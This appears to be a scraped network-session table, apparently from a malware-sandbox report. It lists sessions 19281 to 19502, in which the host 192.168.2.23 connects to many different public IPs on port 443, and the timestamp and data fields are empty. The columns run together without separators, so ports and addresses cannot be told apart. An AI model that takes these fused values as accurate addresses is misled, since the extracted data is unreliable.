                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19281192.168.2.234674070.164.219.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19282192.168.2.2360814218.206.81.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19283192.168.2.234893696.216.38.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19284192.168.2.235550864.129.116.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19285192.168.2.2338620126.29.13.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19286192.168.2.2342786206.181.69.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19287192.168.2.235547096.109.89.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19288192.168.2.234726851.221.81.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19289192.168.2.2338604131.228.115.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19290192.168.2.2344236107.101.192.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19291192.168.2.234799663.24.57.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19292192.168.2.234193252.14.189.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19293192.168.2.2343552175.72.45.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19294192.168.2.2335690100.147.208.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19295192.168.2.2355646222.181.131.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19296192.168.2.2348966134.66.75.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19297192.168.2.2333452116.98.17.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19298192.168.2.233793095.175.11.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19299192.168.2.2345190118.11.188.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19300192.168.2.2345588149.51.111.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19301192.168.2.233828885.152.77.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19302192.168.2.2344096157.201.90.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19303192.168.2.234129451.195.55.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19304192.168.2.2346410116.82.203.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19305192.168.2.2350398203.178.229.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19306192.168.2.234395652.22.160.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19307192.168.2.23598349.83.57.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19308192.168.2.2337270102.107.176.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19309192.168.2.2345852193.227.18.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19310192.168.2.2338798159.194.146.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19311192.168.2.2347536158.145.192.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19312192.168.2.2348950104.99.30.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19313192.168.2.23468685.60.244.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19314192.168.2.2356058105.185.106.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19315192.168.2.234387898.198.88.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19316192.168.2.2359516184.63.33.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19317192.168.2.2343466118.43.247.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19318192.168.2.23586904.249.90.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19319192.168.2.2344544159.97.249.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19320192.168.2.234122872.244.217.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19321192.168.2.234647289.203.42.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19322192.168.2.2359508213.137.251.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19323192.168.2.2337198211.37.207.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19324192.168.2.2341536204.81.146.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19325192.168.2.2352184185.139.128.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19326192.168.2.2344674115.58.150.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19327192.168.2.235045898.230.230.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19328192.168.2.2343022139.216.146.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19329192.168.2.2355344122.97.86.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19330192.168.2.234155463.120.105.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19331192.168.2.235817247.234.115.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19332192.168.2.2355776122.57.196.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19333192.168.2.2332934158.109.251.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19334192.168.2.2343316143.253.20.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19335192.168.2.234720269.109.253.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19336192.168.2.2353238165.108.232.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19337192.168.2.2352452193.122.15.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19338192.168.2.2344416223.23.25.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19339192.168.2.2357108180.0.21.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19340192.168.2.234071212.20.252.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19341192.168.2.2341164119.130.79.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19342192.168.2.2351504132.222.43.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19343192.168.2.2348466218.142.160.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19344192.168.2.235538693.107.130.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19345192.168.2.235899641.133.41.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19346192.168.2.234062875.109.191.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19347192.168.2.2344586116.57.92.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19348192.168.2.2351764106.74.96.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19349192.168.2.234803478.105.81.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19350192.168.2.235684024.160.71.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19351192.168.2.234693064.14.209.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19352192.168.2.233639860.16.47.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19353192.168.2.233910643.194.183.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19354192.168.2.23469309.36.176.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19355192.168.2.2337478147.10.182.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19356192.168.2.233977072.166.197.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19357192.168.2.2352728139.146.119.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19358192.168.2.234592887.112.242.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19359192.168.2.2335412180.107.18.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19360192.168.2.233490214.128.95.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19361192.168.2.236022044.53.3.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19362192.168.2.2344378151.54.212.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19363192.168.2.23494122.90.251.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19364192.168.2.2356260164.178.134.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19365192.168.2.2354542184.49.203.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19366192.168.2.2354506104.180.163.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19367192.168.2.233651095.56.121.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19368192.168.2.234106495.237.198.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19369192.168.2.2340504104.226.235.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19370192.168.2.2355118111.97.128.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19371192.168.2.234686453.34.19.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19372192.168.2.2352236126.233.33.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19373192.168.2.2345184208.221.68.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19374192.168.2.2354040164.203.32.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19375192.168.2.2351486217.24.143.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19376192.168.2.233322672.79.141.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19377192.168.2.2339298124.73.26.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19378192.168.2.235451242.74.201.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19379192.168.2.235652048.129.39.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19380192.168.2.2353376144.99.236.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19381192.168.2.2335836182.117.235.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19382192.168.2.234485644.233.135.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19383192.168.2.2354340183.224.168.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19384192.168.2.2349036207.242.136.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19385192.168.2.234865423.47.45.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19386192.168.2.2337058152.61.79.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19387192.168.2.2352124207.8.48.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19388192.168.2.2340590193.21.99.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19389192.168.2.233301291.223.129.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19390192.168.2.234744293.68.242.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19391192.168.2.2337840121.253.231.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19392192.168.2.2349670197.35.21.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19393192.168.2.233492637.113.125.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19394192.168.2.2332786135.252.161.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19395192.168.2.2359642178.251.137.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19396192.168.2.235498462.220.241.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19397192.168.2.2356704157.224.254.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19398192.168.2.233346294.122.34.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19399192.168.2.2350164156.228.223.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19400192.168.2.2340002146.45.109.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19401192.168.2.2342514149.107.208.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19402192.168.2.2345674216.251.194.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19403192.168.2.2354858203.81.88.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19404192.168.2.2356306103.58.161.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19405192.168.2.235615465.91.42.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19406192.168.2.2342254189.222.138.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19407192.168.2.2353426129.104.111.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19408192.168.2.233521669.154.28.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19409192.168.2.2358072149.218.76.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19410192.168.2.2340268201.120.124.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19411192.168.2.2344620209.161.36.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19412192.168.2.2342126179.41.163.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19413192.168.2.2347878154.237.84.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19414192.168.2.234505660.16.249.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19415192.168.2.2352002209.22.96.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19416192.168.2.2338454114.209.106.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19417192.168.2.2344830147.242.39.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19418192.168.2.235572079.79.113.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19419192.168.2.2339404170.179.194.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19420192.168.2.2334504123.208.238.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19421192.168.2.2354644183.174.108.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19422192.168.2.2352868140.205.3.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19423192.168.2.2346650111.63.0.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19424192.168.2.2357116186.228.210.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19425192.168.2.235393814.135.153.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19426192.168.2.2357494161.119.10.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19427192.168.2.2358092125.252.137.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19428192.168.2.2335394152.26.127.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19429192.168.2.2344740207.7.101.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19430192.168.2.235981680.59.184.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19431192.168.2.234265298.48.180.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19432192.168.2.233598014.211.22.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19433192.168.2.2354082164.176.222.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19434192.168.2.2349318138.109.250.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19435192.168.2.2346358216.206.93.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19436192.168.2.2347686101.146.225.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19437192.168.2.233399639.13.33.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19438192.168.2.235750637.198.178.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19439192.168.2.234939441.175.71.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19440192.168.2.234744686.223.119.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19441192.168.2.2358334223.216.2.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19442192.168.2.235397823.3.98.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19443192.168.2.2333332143.196.76.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19444192.168.2.2348276147.107.88.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19445192.168.2.234118499.242.198.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19446192.168.2.233894837.237.122.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19447192.168.2.235362480.174.95.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19448192.168.2.235036259.236.91.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19449192.168.2.235935238.124.188.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19450192.168.2.2352350131.225.85.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19451192.168.2.2358884110.108.248.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19452192.168.2.235714244.158.65.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19453192.168.2.2347738102.99.122.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19454192.168.2.234300462.123.203.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19455192.168.2.2359180123.165.24.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19456192.168.2.2341012104.198.221.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19457192.168.2.234744290.65.125.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19458192.168.2.233789240.103.230.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19459192.168.2.2347676197.81.141.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19460192.168.2.2355924133.71.230.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19461192.168.2.2342656150.61.132.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19462192.168.2.2346920155.237.61.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19463192.168.2.235798889.91.241.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19464192.168.2.2344158203.175.218.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19465192.168.2.233520883.60.249.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19466192.168.2.2347726139.246.168.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19467192.168.2.2334648163.235.207.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19468192.168.2.2346280149.94.122.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19469192.168.2.2358776125.108.213.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19470192.168.2.2347630120.194.125.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19471192.168.2.2356000117.93.252.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19472192.168.2.235360078.50.233.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19473192.168.2.233330890.150.211.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19474192.168.2.2343700154.60.64.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19475192.168.2.235934860.177.170.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19476192.168.2.2344692113.58.136.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19477192.168.2.2338012162.231.161.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19478192.168.2.2337174195.11.250.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19479192.168.2.2337298199.230.239.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19480192.168.2.2345600145.123.172.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19481192.168.2.234632486.249.11.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19482192.168.2.236085097.135.128.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19483192.168.2.2355984136.91.228.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19484192.168.2.233718039.248.104.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19485192.168.2.2345492209.185.131.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19486192.168.2.233288452.19.125.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19487192.168.2.233756013.225.140.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19488192.168.2.234054095.248.210.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19489192.168.2.2353798149.178.198.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19490192.168.2.2360300121.139.182.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19491192.168.2.2340224186.159.119.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19492192.168.2.233526259.178.125.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19493192.168.2.2344164156.153.243.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19494192.168.2.234611874.185.111.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19495192.168.2.236023618.183.12.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19496192.168.2.2340248189.59.63.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19497192.168.2.2336912111.187.152.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19498192.168.2.2345316204.186.65.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19499192.168.2.2334502154.249.179.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19500192.168.2.2344278134.253.33.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19501192.168.2.2353564100.181.234.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19502192.168.2.2351346187.243.76.255443
